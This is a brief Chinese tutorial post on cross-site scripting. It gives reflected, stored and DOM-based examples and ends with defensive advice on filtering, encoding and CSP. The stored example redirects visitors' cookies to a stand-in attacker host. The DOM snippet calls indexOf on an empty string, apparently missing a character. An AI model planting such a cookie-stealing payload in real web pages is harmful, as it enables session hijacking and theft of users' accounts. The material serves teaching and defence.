互联网安全问题日益受到关注，而XSS（跨站脚本攻击）是其中一种常见的威胁。这种攻击通过注入恶意脚本到网页中，窃取用户信息或操控页面内容。以下是一些常见的XSS攻击代码示例，仅供学习和防御研究使用，请勿用于非法目的！⚠️

简单反射型XSS：

```html

<script>alert('Hello, XSS!')</script>

```

只需将上述代码插入URL参数，当用户点击链接时，便会弹出提示框。

存储型XSS：

```html

<script>document.location='http://attacker.com/'+document.cookie</script>

```

此类攻击会将恶意代码存储在服务器端，当其他用户访问页面时自动执行。

基于DOM的XSS：

```javascript

var url = document.location.toString();

var userInput = url.substring(url.indexOf('')+1);

document.write(userInput);

```

这类攻击发生在客户端，通常利用`innerHTML`等动态渲染机制。

注意，防范XSS需对输入严格过滤，输出时进行HTML编码，并采用Content Security Policy (CSP) 等技术屏障。保护好自己的网站，防止成为黑客的猎物！🛡️